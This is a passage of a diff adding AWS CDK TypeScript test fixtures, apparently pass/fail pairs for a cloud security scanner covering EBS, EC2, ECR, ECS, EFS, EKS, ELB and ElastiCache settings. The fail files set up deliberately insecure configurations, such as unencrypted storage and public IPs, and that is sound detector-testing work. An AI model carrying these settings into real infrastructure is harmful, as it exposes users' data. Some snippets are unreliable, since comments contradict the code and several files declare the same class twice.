+    const instance = new ec2.Instance(this, 'MyInstance', {
+      instanceType: ec2.InstanceType.of(ec2.InstanceClass.T2, ec2.InstanceSize.MICRO),
+      machineImage: ec2.MachineImage.latestAmazonLinux(),
+      vpc: new ec2.Vpc(this, 'MyVpc'),
+    });
+
+    // Create an EBS volume with encryption enabled
+    const volume = new ec2.Volume(this, 'MyVolume', {
+      availabilityZone: instance.instanceAvailabilityZone,
+      size: ec2.Size.gibibytes(10), // Specify the volume size
+      encrypted: false, // Disable encryption for the volume
+    });
+
+    // Attach the volume to the instance
+    instance.instance.addVolumeAttachment('MyVolumeAttachment', {
+      volume,
+      device: '/dev/sdf', // Specify the device name
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new EC2Stack(app, 'EC2Stack');
+app.synth();
+
+
+export class EC2Stack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create an EC2 instance
+    const instance = new ec2.Instance(this, 'MyInstance', {
+      instanceType: ec2.InstanceType.of(ec2.InstanceClass.T2, ec2.InstanceSize.MICRO),
+      machineImage: ec2.MachineImage.latestAmazonLinux(),
+      vpc: new ec2.Vpc(this, 'MyVpc'),
+    });
+
+    // Create an EBS volume with encryption enabled
+    const volume = new ec2.CfnVolume(this, 'MyVolume', {
+      availabilityZone: instance.instanceAvailabilityZone,
+      size: 10, // Specify the volume size in GiB
+      encrypted: false, // Enable encryption for the volume
+    });
+
+    // Attach the volume to the instance
+    new ec2.CfnVolumeAttachment(this, 'MyVolumeAttachment', {
+      instanceId: instance.instanceId,
+      volumeId: volume.ref,
+      device: '/dev/sdf', // Specify the device name
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new EC2Stack(app, 'EC2Stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/EBSEncryption/pass.ts b/cdk_integration_tests/src/typescript/EBSEncryption/pass.ts
new file mode 100644
index 00000000000..3210bf19204
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/EBSEncryption/pass.ts
@@ -0,0 +1,67 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+
+export class EC2Stack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create an EC2 instance
+    const instance = new ec2.Instance(this, 'MyInstance', {
+      instanceType: ec2.InstanceType.of(ec2.InstanceClass.T2, ec2.InstanceSize.MICRO),
+      machineImage: ec2.MachineImage.latestAmazonLinux(),
+      vpc: new ec2.Vpc(this, 'MyVpc'),
+    });
+
+    // Create an EBS volume with encryption enabled
+    const volume = new ec2.Volume(this, 'MyVolume', {
+      availabilityZone: instance.instanceAvailabilityZone,
+      size: ec2.Size.gibibytes(10), // Specify the volume size
+      encrypted: true, // Enable encryption for the volume
+    });
+
+    // Attach the volume to the instance
+    instance.instance.addVolumeAttachment('MyVolumeAttachment', {
+      volume,
+      device: '/dev/sdf', // Specify the device name
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new EC2Stack(app, 'EC2Stack');
+app.synth();
+
+
+
+export class EC2Stack extends cdk.Stack {
+  constructor(scope: cdk.Construct, id: string, props?: cdk.StackProps) {
+    super(scope, id, props);
+
+    // Create an EC2 instance
+    const instance = new ec2.Instance(this, 'MyInstance', {
+      instanceType: ec2.InstanceType.of(ec2.InstanceClass.T2, ec2.InstanceSize.MICRO),
+      machineImage: ec2.MachineImage.latestAmazonLinux(),
+      vpc: new ec2.Vpc(this, 'MyVpc'),
+    });
+
+    // Create an EBS volume with encryption enabled
+    const volume = new ec2.CfnVolume(this, 'MyVolume', {
+      availabilityZone: instance.instanceAvailabilityZone,
+      size: 10, // Specify the volume size in GiB
+      encrypted: true, // Enable encryption for the volume
+    });
+
+    // Attach the volume to the instance
+    new ec2.CfnVolumeAttachment(this, 'MyVolumeAttachment', {
+      instanceId: instance.instanceId,
+      volumeId: volume.ref,
+      device: '/dev/sdf', // Specify the device name
+    });
+  }
+}
+
+// Example usage
+const app = new cdk.App();
+new EC2Stack(app, 'EC2Stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/EC2PublicIP/fail.ts b/cdk_integration_tests/src/typescript/EC2PublicIP/fail.ts
new file mode 100644
index 00000000000..a73de1831e2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/EC2PublicIP/fail.ts
@@ -0,0 +1,35 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        const vpc = new ec2.Vpc(this, 'VPC', {
+            cidr: '10.0.0.0/16',
+            natGateways: 0,
+            maxAzs: 2,
+            subnetConfiguration: [
+                {
+                    name: 'public-subnet-1',
+                    subnetType: ec2.SubnetType.PUBLIC,
+                    cidrMask: 24,
+                },
+            ],
+        });
+
+        const instance = new ec2.Instance(this, 'Instance', {
+            vpc,
+            vpcSubnets: {subnetGroupName: 'public-subnet-1'},
+            instanceType: ec2.InstanceType.of(ec2.InstanceClass.T3, ec2.InstanceSize.NANO),
+            machineImage: new ec2.AmazonLinuxImage({generation: ec2.AmazonLinuxGeneration.AMAZON_LINUX_2}),
+            detailedMonitoring: true,
+            associatePublicIpAddress: true
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/EC2PublicIP/fail_2.ts b/cdk_integration_tests/src/typescript/EC2PublicIP/fail_2.ts
new file mode 100644
index 00000000000..10a70dfb5dd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/EC2PublicIP/fail_2.ts
@@ -0,0 +1,37 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        const vpc = new ec2.Vpc(this, 'VPC', {
+            cidr: '10.0.0.0/16',
+            natGateways: 0,
+            maxAzs: 2,
+            subnetConfiguration: [
+                {
+                    name: 'public-subnet-1',
+                    subnetType: ec2.SubnetType.PUBLIC,
+                    cidrMask: 24,
+                },
+            ],
+        });
+
+        const sg1 = new ec2.SecurityGroup(this, 'sg1', {
+            vpc: vpc,
+        });
+
+        const launchTemplate = new ec2.LaunchTemplate(this, 'LaunchTemplate', {
+            machineImage: ec2.MachineImage.latestAmazonLinux2023(),
+            securityGroup: sg1,
+            associatePublicIpAddress: true
+        });
+
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/EC2PublicIP/pass.ts b/cdk_integration_tests/src/typescript/EC2PublicIP/pass.ts
new file mode 100644
index 00000000000..ec1c92969e1
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/EC2PublicIP/pass.ts
@@ -0,0 +1,35 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+
+        const vpc = new ec2.Vpc(this, 'VPC', {
+            cidr: '10.0.0.0/16',
+            natGateways: 0,
+            maxAzs: 2,
+            subnetConfiguration: [
+                {
+                    name: 'public-subnet-1',
+                    subnetType: ec2.SubnetType.PUBLIC,
+                    cidrMask: 24,
+                },
+            ],
+        });
+
+        const instance = new ec2.Instance(this, 'Instance', {
+            vpc,
+            vpcSubnets: {subnetGroupName: 'public-subnet-1'},
+            instanceType: ec2.InstanceType.of(ec2.InstanceClass.T3, ec2.InstanceSize.NANO),
+            machineImage: new ec2.AmazonLinuxImage({generation: ec2.AmazonLinuxGeneration.AMAZON_LINUX_2}),
+            detailedMonitoring: true,
+            associatePublicIpAddress: false
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECRImageScanning/fail.ts b/cdk_integration_tests/src/typescript/ECRImageScanning/fail.ts
new file mode 100644
index 00000000000..6e03ea4118a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECRImageScanning/fail.ts
@@ -0,0 +1,14 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecr from 'aws-cdk-lib/aws-ecr';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const repository = new ecr.Repository(this, 'Repo', {} );
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECRImageScanning/pass.ts b/cdk_integration_tests/src/typescript/ECRImageScanning/pass.ts
new file mode 100644
index 00000000000..196f3065018
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECRImageScanning/pass.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecr from 'aws-cdk-lib/aws-ecr';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const repository = new ecr.Repository(this, 'Repo', {
+            imageScanOnPush: true
+        } );
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECRImmutableTags/fail.ts b/cdk_integration_tests/src/typescript/ECRImmutableTags/fail.ts
new file mode 100644
index 00000000000..6e03ea4118a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECRImmutableTags/fail.ts
@@ -0,0 +1,14 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecr from 'aws-cdk-lib/aws-ecr';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const repository = new ecr.Repository(this, 'Repo', {} );
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECRImmutableTags/pass.ts b/cdk_integration_tests/src/typescript/ECRImmutableTags/pass.ts
new file mode 100644
index 00000000000..dc6514158fd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECRImmutableTags/pass.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecr from 'aws-cdk-lib/aws-ecr';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const repository = new ecr.Repository(this, 'Repo', {
+            imageTagMutability: ecr.TagMutability.IMMUTABLE
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/fail.ts b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/fail.ts
new file mode 100644
index 00000000000..6e03ea4118a
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/fail.ts
@@ -0,0 +1,14 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecr from 'aws-cdk-lib/aws-ecr';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const repository = new ecr.Repository(this, 'Repo', {} );
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass.ts b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass.ts
new file mode 100644
index 00000000000..07bed88fd73
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecr from 'aws-cdk-lib/aws-ecr';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const repository = new ecr.Repository(this, 'Repo', {
+            encryption: ecr.RepositoryEncryption.KMS
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass_2.ts b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass_2.ts
new file mode 100644
index 00000000000..7be14b9ccd2
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECRRepositoryEncrypted/pass_2.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecr from 'aws-cdk-lib/aws-ecr';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const repository = new ecr.Repository(this, 'Repo', {
+            encryptionKey: new kms.Key(this, 'Key')
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/fail.ts b/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/fail.ts
new file mode 100644
index 00000000000..0b426ff64bd
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/fail.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecs from 'aws-cdk-lib/aws-ecs';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const vpc = new ec2.Vpc(this, 'Vpc', {maxAzs: 1});
+        const cluster = new ecs.Cluster(this, 'EcsCluster', {vpc});
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/pass.ts b/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/pass.ts
new file mode 100644
index 00000000000..55bbc6d5b4d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECSClusterContainerInsights/pass.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecs from 'aws-cdk-lib/aws-ecs';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const vpc = new ec2.Vpc(this, 'Vpc', {maxAzs: 1});
+        const cluster = new ecs.Cluster(this, 'EcsCluster', {vpc, containerInsights: true});
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail.ts b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail.ts
new file mode 100644
index 00000000000..2cae3e163f8
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail.ts
@@ -0,0 +1,24 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecs from 'aws-cdk-lib/aws-ecs';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const taskDefinition = new ecs.Ec2TaskDefinition(this, 'TaskDef', {
+            volumes:
+            [
+                {
+                    name:"my-volume",
+                    efsVolumeConfiguration:{
+                        transitEncryption: "DISABLED"
+                    }
+                }
+            ]
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail_2.ts b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail_2.ts
new file mode 100644
index 00000000000..9cd3fb9954c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/fail_2.ts
@@ -0,0 +1,24 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecs from 'aws-cdk-lib/aws-ecs';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const taskDefinition = new ecs.FargateTaskDefinition(this, 'TaskDef', {
+            volumes:
+            [
+                {
+                    name:"my-volume",
+                    efsVolumeConfiguration:{
+                        transitEncryption: "DISABLED"
+                    }
+                }
+            ]
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/pass.ts b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/pass.ts
new file mode 100644
index 00000000000..a08d3ba958b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ECSTaskDefinitionEFSVolumeEncryption/pass.ts
@@ -0,0 +1,24 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ecs from 'aws-cdk-lib/aws-ecs';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const taskDefinition = new ecs.Ec2TaskDefinition(this, 'TaskDef', {
+            volumes:
+            [
+                {
+                    name:"my-volume",
+                    efsVolumeConfiguration:{
+                        transitEncryption: "ENABLED"
+                    }
+                }
+            ]
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/fail.ts b/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/fail.ts
new file mode 100644
index 00000000000..bc3dde2d494
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/fail.ts
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import * as efs from 'aws-cdk-lib/aws-efs';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const fileSystem = new efs.FileSystem(this, 'MyEfsFileSystem', {
+            vpc: new ec2.Vpc(this, 'VPC')
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/pass.ts b/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/pass.ts
new file mode 100644
index 00000000000..51017b7afad
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/EFSEncryptionEnabled/pass.ts
@@ -0,0 +1,18 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import * as efs from 'aws-cdk-lib/aws-efs';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const fileSystem = new efs.FileSystem(this, 'MyEfsFileSystem', {
+            vpc: new ec2.Vpc(this, 'VPC'),
+            encrypted: true
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/EKSSecretsEncryption/fail.ts b/cdk_integration_tests/src/typescript/EKSSecretsEncryption/fail.ts
new file mode 100644
index 00000000000..1b790ebdb79
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/EKSSecretsEncryption/fail.ts
@@ -0,0 +1,21 @@
+import * as cdk from 'aws-cdk-lib';
+import {aws_eks as eks} from 'aws-cdk-lib';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const cfnCluster = new eks.CfnCluster(this, 'MyCfnCluster', {
+            resourcesVpcConfig: {
+                subnetIds: ['subnetIds']
+            },
+            roleArn: 'roleArn',
+            name: 'name',
+            version: 'version'
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/EKSSecretsEncryption/pass.ts b/cdk_integration_tests/src/typescript/EKSSecretsEncryption/pass.ts
new file mode 100644
index 00000000000..5b8734d322b
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/EKSSecretsEncryption/pass.ts
@@ -0,0 +1,24 @@
+import * as cdk from 'aws-cdk-lib';
+import {aws_eks as eks} from 'aws-cdk-lib';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const cfnCluster = new eks.CfnCluster(this, 'MyCfnCluster', {
+            resourcesVpcConfig: {
+                subnetIds: ['subnetIds']
+            },
+            roleArn: 'roleArn',
+            encryptionConfig: [{
+                resources: ['secrets']
+            }],
+            name: 'name',
+            version: 'version'
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ELBAccessLogs/fail.ts b/cdk_integration_tests/src/typescript/ELBAccessLogs/fail.ts
new file mode 100644
index 00000000000..f38e3428145
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ELBAccessLogs/fail.ts
@@ -0,0 +1,18 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import * as elb from 'aws-cdk-lib/aws-elasticloadbalancing';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const vpc = new ec2.Vpc(this, 'VPC')
+        const lb = new elb.LoadBalancer(this, 'LB', {
+            vpc
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ELBAccessLogs/pass.ts b/cdk_integration_tests/src/typescript/ELBAccessLogs/pass.ts
new file mode 100644
index 00000000000..535a9329061
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ELBAccessLogs/pass.ts
@@ -0,0 +1,20 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import * as elb from 'aws-cdk-lib/aws-elasticloadbalancing';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const vpc = new ec2.Vpc(this, 'VPC')
+        const lb = new elb.LoadBalancer(this, 'LB', {
+            vpc, accessLoggingPolicy: {
+                enabled: true
+            }
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ELBv2AccessLogs/fail.ts b/cdk_integration_tests/src/typescript/ELBv2AccessLogs/fail.ts
new file mode 100644
index 00000000000..3d8462c5d66
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ELBv2AccessLogs/fail.ts
@@ -0,0 +1,19 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+import * as elbv2 from 'aws-cdk-lib/aws-elasticloadbalancingv2';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const vpc = new ec2.Vpc(this, 'VPC')
+        const lb = new elbv2.ApplicationLoadBalancer(this, 'LB', {
+            vpc
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ELBv2AccessLogs/pass.ts b/cdk_integration_tests/src/typescript/ELBv2AccessLogs/pass.ts
new file mode 100644
index 00000000000..74df7870b8c
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ELBv2AccessLogs/pass.ts
@@ -0,0 +1,24 @@
+import * as cdk from 'aws-cdk-lib';
+import * as ec2 from 'aws-cdk-lib/aws-ec2';
+import * as s3 from 'aws-cdk-lib/aws-s3';
+import * as elbv2 from 'aws-cdk-lib/aws-elasticloadbalancingv2';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const vpc = new ec2.Vpc(this, 'VPC')
+        const loggingBucket = new s3.Bucket(this, 'loggingBucket', {
+            encryption: s3.BucketEncryption.S3_MANAGED,
+        });
+        const lb = new elbv2.ApplicationLoadBalancer(this, 'LB', {
+            vpc
+        });
+
+        lb.logAccessLogs(loggingBucket);
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/fail.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/fail.ts
new file mode 100644
index 00000000000..6ba35ed897d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/fail.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import {aws_elasticache as elasticache} from 'aws-cdk-lib';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', {
+            replicationGroupDescription: 'replicationGroupDescription',
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/pass.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/pass.ts
new file mode 100644
index 00000000000..e1c3f49439e
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtRest/pass.ts
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import {aws_elasticache as elasticache} from 'aws-cdk-lib';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', {
+            replicationGroupDescription: 'replicationGroupDescription',
+            atRestEncryptionEnabled: true,
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/fail.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/fail.ts
new file mode 100644
index 00000000000..6ba35ed897d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/fail.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import {aws_elasticache as elasticache} from 'aws-cdk-lib';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', {
+            replicationGroupDescription: 'replicationGroupDescription',
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/pass.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/pass.ts
new file mode 100644
index 00000000000..90b5bbec7c3
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransit/pass.ts
@@ -0,0 +1,17 @@
+import * as cdk from 'aws-cdk-lib';
+import {aws_elasticache as elasticache} from 'aws-cdk-lib';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
+        const cfnReplicationGroup = new elasticache.CfnReplicationGroup(this, 'MyCfnReplicationGroup', {
+            replicationGroupDescription: 'replicationGroupDescription',
+            transitEncryptionEnabled: true
+        });
+    }
+}
+
+const app = new cdk.App();
+new exampleStack(app, 'example-stack');
+app.synth();
diff --git a/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail.ts b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail.ts
new file mode 100644
index 00000000000..6ba35ed897d
--- /dev/null
+++ b/cdk_integration_tests/src/typescript/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail.ts
@@ -0,0 +1,16 @@
+import * as cdk from 'aws-cdk-lib';
+import {aws_elasticache as elasticache} from 'aws-cdk-lib';
+import {Construct} from 'constructs';
+
+export class exampleStack extends cdk.Stack {
+    constructor(scope: Construct, id: string, props?: cdk.StackProps) {
+        super(scope, id, props);
